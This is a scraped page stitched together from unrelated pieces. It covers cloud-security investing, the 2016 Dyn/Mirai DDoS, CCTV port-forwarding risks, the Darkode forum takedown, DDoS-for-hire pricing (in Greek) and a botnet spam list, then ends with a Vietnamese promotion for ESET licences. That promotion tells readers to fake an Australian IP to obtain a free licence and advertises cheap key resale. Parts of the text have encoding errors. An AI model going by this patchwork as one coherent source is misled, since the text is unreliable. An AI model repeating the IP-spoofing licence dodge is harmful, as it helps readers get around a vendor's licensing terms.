The threat from cyber-intrusions seems to have exploded in just the last 18 months. Mainstream media now report regularly on massive, targeted data breaches and on the digital skirmishes waged among nation states and cybermilitants.

Unlike other looming technical problems that require innovation to address, cybersecurity never gets solved. The challenges of circuit miniaturization, graphical computing, database management, network routing, server virtualization, and similarly mammoth technical problems eventually wane as we tame their complexity. Cybersecurity is a never-ending Tom and Jerry cartoon. Like antibiotic-resistant bacteria, attackers adapt to our defenses and render them obsolete.

As in most areas of IT and computing, innovation in security springs mostly from startup companies. Larger systems companies like Symantec, Microsoft, and Cisco contribute to the corpus of cybersecurity, but mostly acquire their new technologies from startups. Government agencies with sophisticated cyberskills tend to innovate more on the offensive side. I think that in the coming years we will see many small, creative teams of security engineers successfully discovering, testing, and building out clever new ways to secure cyberspace.

Anyone looking to found or invest in one of those small security companies destined for success should focus on the tsunami of change rocking the IT world known as cloud computing. In a transformation that eclipses even the advent of client–server computing in the 1980s, business are choosing to subscribe to services in the cloud over running software on their own physical servers. Incumbents in every category of software are being disrupted by cloud-based upstarts. According to Forrester, the global market for cloud computing will grow more than sixfold this decade, to over a quarter trillion dollars.


Cloud security, as it is known, is today one of the less mature areas of cloud computing, but it has already become clear that it will become a significant chunk of that vast new market. A Gartner report earlier this year predicted that the growth of cloud-based security services would overtake traditional security services in the next three years.

Just like other software products, conventional security appliances are being replaced by cloud-based alternatives that are easier to deploy, cheaper to manage, and always up-to-date. Cloud-based security protections can also be more secure, since the vendor can correlate events and profile attacks across all of its customers’ networks. This collaborative capability will be critical in the coming years as the private sector looks to government agencies like the National Security Agency for protection from cyberattacks.

The cloud also enables new security services based on so-called big data, which could simply not exist as standalone products. Companies like SumoLogic can harvest signals from around the Web for analysis, identifying attacks and attackers that couldn’t be detected using data from a single incident or source.

These new data-centric, cloud-based security products are crucial to solving the challenges of keeping mobile devices secure. Most computers shipped today are mobile devices, and they make juicier targets than PCs because they have location and payment data, microphones, and cameras. But mobile carriers and employers cannot lock down phones and tablets completely because they are personal devices customized with personal apps. Worse, phones and tablets lack the processing power and battery life to run security processes as PCs do.

Cloud approaches to security offer a solution. Software-as-a-service security companies like Zscaler can scan our mobile data traffic using proxies and VPNs, scrubbing them for malware, phishing, data leaks, and bots. In addition we see startups like Blue Cava, Iovation, and mSignia using Big Data to prevent fraud by fingerprinting mobile devices.

Cloud security also involves protecting cloud infrastructure itself. New technologies are needed to secure the client data inside cloud-based services against theft or manipulation during transit or storage. Some security auditors and security companies already sell into this market, but most cloud developers, focused on strong customer growth, have been slow to deploy strong security. Eventually it should become possible for cloud computing customers to encrypt and destroy data using their own encryption keys. Until they do, there is an opportunity for startups such as CipherCloud and Vaultive to sell encryption technology that is used by companies over the top of their cloud services to encrypt the data inside.

Lastly, cloud security also includes protecting against the cloud, which enables creative new classes of attack. For example, Amazon Web Services can be used for brute force attacks on cryptographic protocols, like that one German hacker used in 2010 to break the NSA’s Secure Hashing Algorithm. Attackers can use botnets and virtual servers to wage distributed denial of service attacks; and bots can bypass captcha defenses by crowdsourcing the answers. Cloud-based attacks demand innovative defenses that will likely come from startups. For example, Prolexic and Defense.net (a company Bessemer has invested in) operate networks of filters that buffer their clients from cloud-based DDOS attacks.

Cloud computing may open up enormous vulnerabilities on the Internet, but it also presents great opportunity for innovative cybersecurity. In the coming decade, few areas of computing will be as attractive to entrepreneurs, technologists, and investors.
          DDoS attack highlights benefits of Apple’s secure HomeKit platform        
  Mirai-based DDoS attack highlights benefits of Apple's secure HomeKit platform By Mikey Campbell Friday, October 21, 2016, 10:25 pm PT (01:25 am ET) A distributed denial of service (DDoS) attack that on Friday severely impacted internet access for many U.S. web denizens was found to be in part enabled by a botnet targeting unprotected "Internet of Things" devices. For Apple, the revelation vindicates a controversial walled garden approach to IoT borne out through the HomeKit protocol. As detailed yesterday, unknown hackers set their sights on Dyn, an internet management company that provides DNS services to many major web entities. A series of repeated attacks caused websites including The Verge, Imgur and Reddit, as well as services like HBO Now, and PayPal, to see slowdowns and extended downtimes. Follow-up waves played havoc with The New York Times, CNN, Netflix, Twitter and the PlayStation Network, among many others. Though Dyn was initially unable to Read the full article →
          Internet & Network Softwares : Symantec Norton 360 v3.0 All-in-One PC Internet & Network Softwares $39.99        

Protects against virsuses, worms, hackers, and botnets, Safeguards against online identity theftProtects important files, Keeps your PC tuned and running at peak performance

          The 5 cyber security statistics you need to know in 2017        
‘Cybercrime is the greatest threat to every company in the world’ says IBM’s CEO, Ginni Rometty. If you’re already working on boosting your security – or haven’t started yet – now’s the time. Here’s five reasons why…


1. Cybercrime cost to hit £2.41 trillion a year - Juniper Research


Cybercrime is expensive. Get hit and you’ll feel it in your profits. For example, a successful DDoS attack will force your systems offline and can cost you upwards of Â£100,000 every hour. 2016 reported a 22% increase in cybercrime and it certainly didn’t go unnoticed in the media. Big names like Yahoo, TalkTalk, Tesco, Netflix, Sony and even the presidential election were victim to cyber-attacks.

Get EC-Council’s Certified Ethical Hacker certification to help defend against attacks.


2. Cyber security spending to exceed £815 billion by 2021 - CSO Online


Businesses continue to realise the need to spend more on cyber security products, like software and training. In 2016, over Â£6.5bn was spent worldwide on information security (Gartner).

Despite this growing demand for training, a 2016 government report highlights that there’s still much to be done for businesses. With just under a fifth of businesses ensuring their staff take part in cyber security training in 2016, staff and the general public are still too unaware of their responsibilities in this regard.  

3. Unfilled cyber security jobs to reach 1.5 million by 2020 - (ISC)² 


There’s a severe shortage of qualified cyber security professionals. What’s more, the average salary for a CISSP certified professional is now £62,500.

The effect of this shortage means businesses are struggling to implement the security measures needed. A recent study by Cybersecurity Ventures of over 1,000 IT Professionals globally found that IT security managers reported significant obstacles in implementing desired security projects due to lack of expertise (34.5%) and inadequate staffing (26.4%).


4. Four billion people online by 2020 (Microsoft)


Double the current number of people will be online by 2020. As 91% of attacks begin with email phishing (Mimecast), the potential exploitation for hackers here is massive. Avoid social engineering attacks by educating your employees on information security.

More worrying statistics concerning the growing number of employees online and with access to sensitive data, came from AXELOS. They found that 75% of large organisations and nearly a third of small organisations suffered staff-related security breaches in 2015 and 50% of the worst breaches of the same year were caused by human error.   

A simple and cost-effective way to test your employees cyber security knowledge is through EC-Council’s Certified Secure Computer User (CSCU) test. This will help benchmark the cyber security awareness and competence of your workforce.


5. 200 billion IoT devices will need securing by 2020 (Intel)


More internet connected devices – from thermostats to fridges - in the hands of the public means more opportunities for hackers to infiltrate home networks.

Take a look at the recent hack of the DNS provider Dyn, which brought down major organisations, as a result of an army of 100,000 IoT devices being hacked. Dyn Vice President Scott Hilton stated that the compromised devices had been hit with the notorious Mirai malware that scans for IoT devices that are still using their default passwords. It then enslaves those devices to a botnet army, which was used to force Dyn offline.

As technology develops and individuals and businesses increasingly adopt these novel technologies, the phrase, “with great power, comes great responsibility” has never rung truer. 

Are you prepared for the next cyber-attack?  

          Two-Factor Authentication: What it is and Why You Should be Using it Now        

Not too long ago, WordPress sites around the world started getting attacked with automated botnet traffic trying to brute force admin passwords. The other day, the official Twitter account of the Associated Press was hacked. Last year, Wired reporter Mat Honan was hacked when his Amazon account was compromised. That compromise allowed an attacker to …

The post Two-Factor Authentication: What it is and Why You Should be Using it Now appeared first on Technosailor.com.


          CCTV exposed. Why understanding network security is so important.        

For those of you who are regulars on Geekzone you’ll know one of my pet peeves is people who don’t understand the huge security risk associated with port forwards. Configuring a port forward in your router or firewall is something configured by people every day, with the vast majority probably failing to consider the security risks of something that’s so easily done.

Opening up your network to allow traffic from anywhere on the Internet to directly access your PC or hardware behind your router and/or firewall removes an entire layer of security, and allows anybody on the Internet to directly access your PC or hardware on the port(s) that have been forwarded. If there are security exploits in either the software on your PC or the hardware it could easily compromise your entire network and your security.

If you’re running a VoIP setup and port forward port 5060 you’re opening your IP PBX or phone system up to what will be a never ending attack from bots and scripts trying to find holes your system for the purpose of routing illegitimate calls.  By setting up a port forward to CCTV equipment you run the risk of your security cameras being left wide open for anybody on the Internet to view for both entertainment and for possible malicious purposes.

In recent days we’re once again seen a mainstream media article on Stuff discussing compromised or poorly configured CCTV cameras in New Zealand that can be openly viewed by anybody on the Internet. While Stuff have chosen not to name where these cameras are linked from, the source is insecam.org, a site that proclaims itself as “the world biggest directory of online surveillance security cameras”. This story is very similar to another run in 2014 in the NZ Herald discussing the very same issue with cameras in New Zealand viewable on the insecam website.

cctv image 1

cctv image 3

While this site lists only lists openly viewable CCTV equipment, IoT search tool Shodan is the best resource on the Internet for discovering hardware devices (both CCTV and other) that are exposed to the Internet. Many of these devices are “compromised” because of one simple flaw – either configuring port forwards to allow remote access, or enabling UPnP allowing the devices to create their own port forwards for remote access. It’s worth pointing out here that the insecam website isn’t doing anything illegal – they’re simply aggregating content that’s all publically accessible.

If you’ve got CCTV cameras then it’s not an unrealistic requirement to want to view these remotely. Most systems these days offer web access and/or mobile apps allowing you to view your cameras from anywhere in the world, and many even pitch remote access as a key selling point. The simplest way to configure remote access is to set up a port forward allowing direct access to the camera itself, a Network Video Recorder (NVR) or a Digital Video recorder (DVR).

Some equipment may also be UPnP enabled to make this process even easier – if you have a router with UPnP capabilities and the UPnP functionality is enabled on both your router and the CCTV equipment you may have your CCTV equipment exposed to the Internet even without your knowledge. By having a port forward or UPnP enabled you’ve exposed your CCTV system to the entire Internet and it’s now as a secure as the hardware you’re using.. And that’s where the problems start.

Many people clearly never change default passwords of some of the equipment viewable on the Internet. Many brands of cheap Chinese CCTV equipment also run embedded software of dubious quality with very well known exploits and hacks. Many also contain backdoor passwords, meaning that even if you change the password these devices can still be accessed by anybody with this knowledge. As many of these systems are never upgraded by installers or end users, flaws that have been fixed can often still exist for the life of the system.

The issues also extend beyond somebody snooping on your video feeds – some of these exploits can also be used to turn your hardware into a bot capable of being used for major DDoS attacks, or even turned into a tool for mining bitcoins. In September 2016 one the world’s largest DDoS attacks against krebsonsecurity was reportedly performed with the assistance of over 145,000 compromised CCTV cameras.

In my day job as a network engineer I’ve had numerous dealings with security companies who lack even basic fundamental knowledge when it comes to networking and security. Concepts of networking are something that many people will fail to grasp, with many people relying on the advice of others or a “she’ll be right” mentality rather than seeking proper advice from an expert.

There have been many threads here on Geekzone about CCTV systems and comments posted by people who have been told that “nobody knows your IP address”, “you’re on a dynamic IP address which keeps changing so nobody will find you”, “I’ll change the port to something random so they won’t find you” or “if you make your password secure you’ll be fine”. Statements like this show a fundamental lack of knowledge, and when they’ve given by people posing to be security experts, should really be raising alarm bells. Having a public IP that changes regularly or changing ports offers absolutely nothing in the way of security. Likewise having a secure password is meaningless if a backdoor master password exists on your device.

If you’re wanting remote access to most hardware on an internal network there is only one safe way to do this – by using a Virtual Private Network (VPN). By using an appropriate router with a built in VPN server you can connect your remote PC or phone via VPN and then safely browse your cameras with no risk of your cameras or data being exposed to the entire Internet. If access is only required from specific connections then you could also look to restrict access to a locked down range of public IP addresses to ensure your cameras are not unnecessarily exposed.

If you have an IP camera, NVR or DVR that’s exposed to the Internet using port forwards or you have UPnP enabled you should be taking immediate steps to secure it. If your knowledge of networking doesn’t extend to configuring a VPN then you should be disabling remote access and/or UPnP until such time as you are able to implement a VPN or lock down access to specific IP ranges.

If your security or CCTV installer has no issues with allowing port forwards then you should be on the lookout for a new installer. You’re not just compromising your own safety and security, you’re also compromising the safety, security and end user experience of everybody on the Internet if your hardware can be compromised and used as a bot for DDoS attacks.


          BBC: Darkode hacking forum forced offline        
By Leo KelionTechnology desk editor  BBC

15 July 2015
From the sectionTechnology
The Darkode forum, which was created about six years ago, can no longer be accessed
Darkode - a notorious hacking forum used by Lizard Squad and other cybercriminals - has been shut down after an investigation carried out by authorities in 20 countries.
"We have dismantled a cyber-hornets' nest... which was believed by many, including the hackers themselves, to be impenetrable," said one of the US state attorneys involved.

Twenty-eight people have been arrested.

They include a 26-year-old man from Coventry, England.

In addition, the UK's National Crime Agency said an address in Paisley, Scotland, had been searched and material removed for examination. It said that five other suspected members of the site had previously been arrested.

The FBI added that dozens of other people linked to the site had been charged or had their property searched as part of the inquiry.
Restricted access
Darkode's members allegedly used the site to trade and to share hacking tools and information, including details of zero-day attacks - techniques that exploited flaws in products that neither their creators nor the wider security industry were aware of, and thus could not be protected against.

This information was password-protected.

"Only those proposed for membership by an existing user could join, but not until they posted a resume of the skills and achievements that could contribute to the criminal community," explained the NCA.

"There was a hierarchical membership structure, and the status of users determined who they could communicate with, and their access to the commodities and services on offer."

Although the site was not accessible to the general public, it was profiledextensively by the security blogger Brian Krebs, who posted several screenshots on his site.

Botnets - networks of hijacked computers used to mount co-ordinated attacks - were promoted on the site
"Most of the cybercrime forums are in Russian or some other language that's not English, but this was an English-language forum," he told the BBC.

"And it was a sort of meeting ground for cybercriminals from different nationalities and languages.

"A fairly significant number of people were selling botnet services there, and there were also services for deploying malware and phishing."

He added that the forum's visitors included members of Lizard Squad - a group of hackers which has carried out high-profile attacks on Sony, Microsoft and others.

"The guy that was most recently the admin of the forum used the nickname Sp3c," Mr Krebs recalled.

"He was a leading member of the Lizard Squad. What's interesting is that you don't see his name in the lists of those that were apprehended or charged as part of this.

"I don't really know what that means, but there was a definite connection between the Lizard Squad and this forum, at least in the last year or so."

The FBI said that Operation Shrouded Horizon had indicated up to 300 people had used the forum.

"During the investigation, the bureau focused primarily on the Darkode members responsible for developing, distributing, facilitating and supporting the most egregious and complex cybercriminal schemes targeting victims and financial systems," it said.

It added that its counterparts in Australia, Bosnia, Brazil, Israel, Colombia and Nigeria were among those involved in the international crackdown, and that efforts to trace other suspects were "ongoing".

          Black Hat 2014: How to Hack the Cloud to Mine Crypto Currency        
Cyber security researchers devise a hack to demonstrate the need for improved anti-botnet security measures
          Comment on Dutch Police infect users with trojan – legal or illegal; good thing or bad thing? by Crimefighters take down Beebone botnet - ITsecurityITsecurity        
[…] But the crimefighters are learning. When the Dutch police ‘took down’ the Bredo botnet in 2010, they ‘infected’ every bot communicating with the servers with their own warning malware. Strictly speaking they almost certainly broke European laws. (See Dutch Police infect users with trojan – legal or illegal; good thing or bad thing?). […]
          NerdTech 15 - Vírus        
Neste podcast: Falamos dos vírus mais famosos e quebramos alguns mitos do tipo: "não existe vírus para Mac". ARTE DA VITRINE:  André Carvalho ESTE NERDCAST É UM OFERECIMENTO DA ALURA Toda a PRIMEIRA sexta-feira do mês você vai ter um Nerdcast extra sobre tecnologia. Acesse: http://www.alura.com.br/promocao/nerd Links citados no programa https://www.alura.com.br/podcast-nerdtech/links Nerdologia Tech 04 - Botnets: um exército zumbi pronto para atacar: https://goo.gl/HeuFcr NerdTech Playlist completa Nerdtech: https://goo.gl/18WWFs E-MAILS Mande suas críticas, elogios, sugestões e caneladas para nerdcast@jovemnerd.com.br EDIÇÃO COMPLETA POR RADIOFOBIA PODCAST E MULTIMÍDIA http://radiofobia.com.br
          â€žTele2“ perspėja apie plintančias virusines SMS žinutes        
Telekomunikacijų bendrovė „Tele2“ perspėja apie plintančias žinutes su nuoroda į kenkėjišką programą.

Žinutės siunčiamos „Android“ operacinę sistemą naudojantiems išmaniesiems telefonams. Žinutėje pateikiamas tekstas su nuoroda „Privet tut fotki http://bit.ly/YJrDjG kak tebe?“. Paspaudus nuorodą, vartotojas nukreipiamas į svetainę internete, iš kur atsiunčiama kenkėjiška programa. Pastaroji analogiškas žinutes išsiunčia visiems kontaktų knygoje esantiems adresatams. 

„Vartotojai turėtų bÅ«ti budrÅ«s – svarbu nespausti pateiktų nuorodų, neatsakinėti ar neatlikti kitų veiksmų prieš tai neįsitikinus, ar tai saugu“, – sakė „Tele2“ Produkto vadovas Mindaugas Kežionis. 

Kaip elgtis gavus tokią žinutę? Svarbiausia – nespausti joje pateiktos nuorodos, o paspaudus – nesutikti diegti atsiųstos programos. diegus programą kyla grėsmė, kad kibernetiniai sukčiai įtraukti telefoną į „apkrėstųjų“ (angl. botnet) tinklus. Tokiu bÅ«du telefonas automatiškai išsiųs analogišką žinutę visiems kontaktų knygoje esantiems adresatams. „Botnet“ tinkle esančiu telefonu kibernetiniai sukčiai gali naudotis ir vėliau – jame esantiems kontaktams siuntinėti pranešimus. 

Apsaugai nuo analogiškų virusinių SMS žinučių „Tele2“ siÅ«lo rinktis specialias antivirusines programas mobiliesiems telefonams. Dauguma tokių programų nemokamai pasiekiamas „Goole Play“ aplikacijų parduotuvėje.
 
Daugiau informacijos 
Andrius Baranauskas, „Tele2“ korporacinės komunikacijos direktorius Baltijos šalims
mob. +370 683 66319, el. paštas: 
andrius.baranauskas@tele2.com
          Ten Most wanted Spam Botnets        
Spam continues to flood most of our inboxes despite the numerous filters used to check them. One of the big reason for this is the growth in malicious botnets.

Botnets are command-and-control systems used by cyber criminals to send spam into our email boxes. M86 Security recently released 'Top Ten Most Wanted' spam-spewing Botnets list.

Rustock(43%) : Rustock's malware employs a kernel-mode rootkit, inserts random text into spam and is capable of TLS encryption. Concentrates solely on pharmaceutical spam.

Mega-D(10.2%) : This long-running botnet has had its ups and downs, owing to the attention it attracts from researchers. Concentrates mostly on pharmaceutical spam.

Festi(8%) : This spambot employs a kernel mode rootkit and is often installed alongside Pushdo on the same host.

Pushdo(6.3%) : This is a multi-faceted botnet with many different types of campaigns. A major distributor of malware downloaders and blended threat e-mails, but also sends pharma, replica, diploma and other types of spam.

Grum(6.3%) :
This too uses a kernel-level rootkit. Grum employs a range of spamming templates that change often, served up by multiple Web servers. Mostly pharma spam.

Lethic(4.5%) : The malware acts as a proxy by relaying SMTP from a remote server to its destination. This too is largely pharma and replica spam.

Bobax(4.3%) : Another old timer, this botnet employs sophisticated methods to locate its command servers.

Bagle(3.5%) : Bagle gets its name from an earlier mass-mailing worm. This Bagle variants act as proxies for data, and especially spam.

Maazben(2.0%) :
Maazben uses a proxy-based spam engine. In certain cases it may also use a template-based spam engine if the bot runs behind a network router. The botnet specialises in Casino spam.

Donbot(1.3%) : Donbot is named after the string "don" found in the malware body. This too is largely pharma spam. "Other" spambots account for 10.7% of all spam.




          Comment on Why Gridcoin Beats Golem Hands Down by Nathan        
BOINC is a platform (a set of tools) for creating a distributed computing project in a standardized way. Anybody (including businesses) can create a BOINC project and submit it for inclusion on the Gridcoin whitelist. The whitelist is primarily in place to deal with hacked / abusive projects which have no work units, give away credits, run malware, or otherwise behave in some way that essentially steals a share of the GRC rewards. That said, ultimately the whitelist is not a hard requirement and there are various ways it could be removed, though I'm not certain that would be a good thing. Note that Golem expects every user to maintain his or her own whitelist, so the only difference here is the community vs. individual aspect. There are arguably some advantages to the Gridcoin approach, especially since not every user will have the time or sophistication to deal with tasks that run malicious code such as botnets or tasks that attempt to jailbreak and attack the host systems.
          Î§Î¬ÎºÎµÏ πωλούν με την ώρα τις υπηρεσίες τους στην μαύρη αγορά        


Τα επίπεδα των παράνομα προσφερόμενων υπηρεσιών σε μία ψηφιακή επίθεση (τύπου DDoS), η οποία οργανώνεται στη μαύρη αγορά, δεν απέχουν πολύ από αυτά μίας νόμιμης επιχείρησης. Η βασική διαφορά είναι ότι δεν υπάρχει απευθείας επαφή ανάμεσα στον προμηθευτή και τον πελάτη, σημειώνουν οι αναλυτές της Kaspersky Lab.

H οργάνωση μίας ψηφιακής επίθεσης κοστίζει 7 δολάρια την ώρα, ενώ η εταιρεία-στόχος ενδέχεται υποστεί ζημιά χιλιάδων, αν όχι εκατομμυρίων. Ομάδες ψηφιακών εγκληματιών που λειτουργούν με τη εταιρική δομή είναι οι πάροχοι τέτοιων υπηρεσιών, ακολουθώντας τα γνωστά μοντέλα πώλησης και υποστήριξης. Για παράδειγμα, προσφέρουν μία χρηστική ιστοσελίδα όπου οι πελάτες, αφού εγγραφούν, μπορούν να επιλέξουν την υπηρεσία που χρειάζονται, να την πληρώσουν και να λάβουν μία αναφορά για τα αποτελέσματα των επιθέσεων. Σε κάποιες περιπτώσεις υπάρχει ακόμα και πρόγραμμα επιβράβευσης, με τους πελάτες να λαμβάνουν ανταμοιβές και μπόνους πόντους για κάθε επίθεση.

Είναι επίσης ενδιαφέρον ότι ορισμένοι ψηφιακοί εγκληματίες δεν έχουν κανέναν ενδοιασμό να πωλούν επιθέσεις DDoS και παράλληλα προστασία από αυτές.

Υπάρχουν διάφοροι παράγοντες που επηρεάζουν το κόστος για τον καταναλωτή. Ένας είναι ο τύπους των επιθέσεων και η προέλευσής τους. Ένα botnet αποτελούμενο από συσκευές IoT είναι φθηνότερο από ένα αντίστοιχο botnet server. Ωστόσο, δεν είναι όλοι οι προμηθευτές έτοιμοι να παρέχουν τέτοιες πληροφορίες. Ένας άλλος παράγοντας είναι η διάρκεια της επίθεσης (υπολογίζεται σε δευτερόλεπτα, ώρες και ημέρες) και η τοποθεσία του πελάτη. Οι επιθέσεις DDoS στις αγγλόφωνες ιστοσελίδες για παράδειγμα, είναι συνήθως πιο ακριβές από τις παρόμοιες επιθέσεις σε ρωσόφωνες ιστοσελίδες.
Ένας άλλος μεγάλος τομέας που επηρεάζει το κόστος είναι το είδος του θύματος. Οι επιθέσεις σε κυβερνητικές ιστοσελίδες και πηγές είναι πολύ πιο ακριβές λόγω του ότι προστατεύονται από anti-DDoS συστήματα και υπάρχει υψηλός κίνδυνος εντοπισμού. Για παράδειγμα, σε μία ιστοσελίδα υπηρεσιών DDoS-as-a-service το κόστος μίας επίθεσης σε μία σειρά από απροστάτευτες ιστοσελίδες κυμαίνεται από 50 έως 100 δολάρια, ενώ μία επίθεση σε μία προστατευμένη ιστοσελίδα κοστίζει περισσότερο από 400 δολάρια.

Αυτό σημαίνει ότι μία επίθεση DDoS μπορεί να κοστίζει από 5 δολάρια για μία επίθεση 300 δευτερολέπτων μέχρι 400 δολάρια για μία επίθεση 24 ωρών. Το μέσο κόστος για μία επίθεση είναι περίπου 25 δολάρια την ώρα. Οι ειδικοί της Kaspersky Lab υπολογίζουν ότι μία επίθεση που χρησιμοποιεί cloud-based botnet 1.000 υπολογιστών κοστίζει στους παρόχους υπηρεσιών 7 δολάρια την ώρα. Αυτό σημαίνει ότι οι ψηφιακοί εγκληματίες οργανώνουν επιθέσεις DDoS που τους αποφέρουν κέρδος κοντά στα 18 δολάρια την ώρα.

Υπάρχει, ωστόσο, ένα ακόμη σενάριο που προσφέρει μεγαλύτερη κερδοφορία στους ψηφιακούς εγκληματίες και απαιτεί οι επιτιθέμενοι να ζητούν λύτρα από έναν στόχο σε αντάλλαγμα να μην ξεκινήσουν μια επίθεση DDoS ή να αποκαταστήσουν μια επίθεση που βρίσκεται σε εξέλιξη. Τα λύτρα μπορεί να είναι το ισοδύναμο bitcoin χιλιάδων δολαρίων, πράγμα που σημαίνει ότι η κερδοφορία μιας και μόνο επίθεσης μπορεί να υπερβεί το 95%. Στην πραγματικότητα, όσοι πραγματοποιούν τον εκβιασμό δεν χρειάζεται καν να έχουν τους πόρους για να ξεκινήσουν μια επίθεση - μερικές φορές η απειλή αρκεί.

[via]




          New VPN Ban in Russia Latest Step in Increasing Cyber Risk for US Companies        

Location

United States
Date published: 
August 3, 2017

"Moreover, Scott Shackelford, cybersecurity program chair at Indiana University, said the case in part “illustrates the difficulty of shutting down botnets (given how easy it is to set up new command and control servers), along with the trouble of protecting trademarks online. At a higher level, it helps highlight the difficulty of exercising jurisdiction in an interconnected world.”"


          Information Security - Aja dwc , Dubai         
Information Security (3 semester hours) is a comprehensive study of the principles and practices of computer system security including operating system security, network security, software security and web security. Topics include common attacking techniques such as virus, trojan, worms and memory exploits.
Introduction
  • Course introduction (syllabus, policies, projects, and recent cyber threats overview)
  • An overview of information security: confidentiality, integrity, and availability
Understanding the Threats
  • Malicious software (Viruses, trojans, rootkits, worms, botnets)
  • Memory exploits (buffer overflow, heap overflow, integer overflow, format string)
Formalisms
  • Access control theory, access control matrix
  • Information flow
Policy
  • Security policies
  • Confidentiality policies (BLP model)
  • Integrity policies (Biba, and Clark-Wilson model)
  • Hybrid policies (Chinese Wall model, role-based access control)

Cost:

Certified


          Les attaques MALfi utilisées pour le déploiement de Botnets jetables à usage unique, une nette tendance pour la cybercriminalité        
SecuObs.com : 16/11/2009 - secuobs : Les attaques MALfi utilisées pour le déploiement de Botnets jetables à usage unique, une nette tendance pour la cybercriminalité
          Hacker Sentenced to 46 Months in Prison for Spreading Linux Malware        
A Russian man accused of infecting tens of thousands of computer servers worldwide to generate millions in fraudulent payments has been imprisoned for 46 months (nearly four years) in a United States' federal prison. 41-year-old Maxim Senakh, of Velikii Novgorod, was arrested by Finnish police in August 2015 for his role in the development and maintenance of the infamous Linux botnet called

          2 millions de mots de passe volés        
Deux millions de mots de passe de Facebook, Twitter, Yahoo et ADP volés, retrouvés sur le serveur Pony Botnet
          Season 1 Episode 17        
In this episode: The first Linux botnet has been detected, version 2.6.31 of the Linux kernel has been released and the Haiku project announces the availability of Alpha 1 of its BeOS-like operating system. We discuss Novell's expensive foray into iPhone development with its MonoTouch SDK and we ask whether we should focus on other Unixes alongside Linux.
          Miễn phí 6 tháng bản quyền Eset Premium Security        

 Những tính năng hữu ích của ESET Security

Computer Protection: Giúp bạn bật tính năng bảo vệ theo thời gian thực. Một điều rất hay của ESET Security đó là tính năng Gamer Mode mà ít phần mềm nào có được trong việc tối ưu hóa hiệu năng khi giải trí trực tuyến và thuyết trình. Khi tính năng này được bật, phần mềm sẽ tính toán hệ thống và từ đó có được hiệu suất tối ưu nhất cho người dùng.

Internet Protection: Giúp bạn tùy chỉnh các tính năng bảo mật trên internet bao gồm web, email, chống spam và lừa đảo trực tuyến. Không như các ứng dụng khác chỉ tích hợp trên web là chủ yếu, ESET Security cho phép người dùng đưa công cụ bảo mật này vào bất kỳ một ứng dụng email nào để từ đó loại trừ hiểm họa không mong muốn.

Network Protection: Giúp bạn tùy chỉnh các bảo mật về an ninh mạng như tường lửa cá nhân và tấn công mạng có chủ đích. Nhấn mạnh về khía cạnh bảo mật người dùng và hệ thống, ESET Smart Security cũng mang đến tiện ích chống tấn công dạng botnet như chặn IP, máy tính kết nối... nhằm mang đến kết nối an toàn cho người dùng. Đây cũng là một tính năng khá hữu ích mà ESET Smart Security tích hợp.

Cải thiện môi trường mạng xã hội và thanh toán trực tuyến

Để khai thác tính năng bảo mật ngân hàng và thanh toán điện tử, người dùng chọn vào menu Security Tools để tùy chỉnh. Tại mục này, có 3 tùy chọn rất độc đáo mà không phải phần mềm bảo mật nào cũng tích hợp đó là bảo mật thanh toán trên các website ngân hàng và thanh toán điện tử.

Bên cạnh đó, việc chống các trang web độc hại cũng được tăng cường bên cạnh tính năng chống trộm khá độc đáo cho người dùng khi bảo mật dữ liệu cũng như tìm kiếm thiết bị khi bị thất lạc.

Eset smart security - Chống trộm

Phân tích những nguy hại từ mạng xã hội, cũng như những đường dẫn ngụy trang nguy hại cũng là một tính năng hữu ích mà ESET Smart Security mang đến cho người dùng. Với công cụ này, người dùng sẽ được thống kê những đường dẫn có thể mang lại mối nguy hại cho người dùng.

Eset smart security - chống virus mạng xã hội

Ngoài ra, tính năng này cũng giúp bảo vệ thông tin người dùng thông qua việc trực tiếp kết nối ứng dụng nhằm tăng cường an ninh cho tài khoản mạng xã hội của mình.

Các tùy chỉnh nâng cao

Các tùy chỉnh nâng cao được nhiều hãng bảo mật dành cho người dùng chuyên nghiệp trong việc khai thác hơn nữa tính năng của chương trình. Để tùy chỉnh tính năng này, từ bên phải dưới cùng của ứng dụng, bạn chọn Advanced Setup để vào giao diện chính.

Eset smart security - tùy chỉnh nâng cao

Đáng chú ý trong mục này chính là phần Web và Email, giúp người dùng bảo mật cho hầu hết các mối nguy hại trên môi trường internet như các ứng dụng nguy hiểm, các trang web nguy hại và cả luôn phần tùy chỉnh thanh toán điện tử và bảo mật ngân hàng.


http://2.bp.blogspot.com/-kSOFggsYY-k/U7Fp7boH1zI/AAAAAAAAF48/Sisj5VAOQgw/s1600/Download+Key4VIP.info.png
Nếu bạn thấy bài viết có ích hãy Click LIKE ủng hộ Fanpage của chúng tôi như 1 lời động viên và chúng tôi thêm động lực Share thêm nhiều hơn nữa:

Fanpage: https://www.facebook.com/Key4VIP.info/
Link đăng ký : https://www.eset.com/au/geteset/ ( Cần Fake IP sang nước Úc ).
Khai báo như hình kèm mã Flyer Licence Key (trong hình ).
Tiếp đó click vào: Get your license. Và đợi !
Mình test có lúc được lúc không,có thể do nhiều người đăng ký nên các bạn cứ từ từ nhé.


 www.Key4VIP.info - Dịch vụ bán key bản quyền Windows Xp-Windows 7-Windows 8.1 -Windows 10,Office 2010 Standard và Pro Plus,Office 2013 Pro Plus,Office 2016 Pro Plus cho cả 32 Bit và 64 Bit giá rẻ.Bản quyền Windows Server 2008 R2 Standard - Enterprisse - Web Edition - Datacenter bảo hành VÄ©nh Viễn. Windows Server 2012 và R2 các bản Standard - Datacenter. Các ứng dụng máy chủ nhÆ° SQL Server,SharePoint Server,Kaspersky Server,Exchange Server 2010 - 2013 và 2016.
Bản quyền diệt Virus Kaspersky - Bitdefender - Avast Internet - Trendmicro..............................................

Mr.Long - Hỗ trợ kỹ thuật,mua bán.
Phone: 0934.363.833 ( Viber,Zalo ) - Ưu tiên hỗ trợ qua số điện thoại trực tiếp để tránh mất thời gian tới 2 bên.
Skype: key4vip.info
Facebook : fb.com/KillKook
Fanpage: https://www.FB.com/Key4VIP.info/

Email: CD4pro@gmail.com

Hướng dẫn mua License các bạn cũng có thể tham khảo tại www.Key4VIP.info




CHÚNG TÔI chào mừng người có THIỆN CHÍ - CÓ VĂN HÓA.
(Vui lòng không nhắn tin .Và Call nếu bạn không liên hệ qua Yahoo được.).Vui lòng Click vào đây trước khi bạn có ý muốn giao dịch với Key4VIP.info.Thân mến!


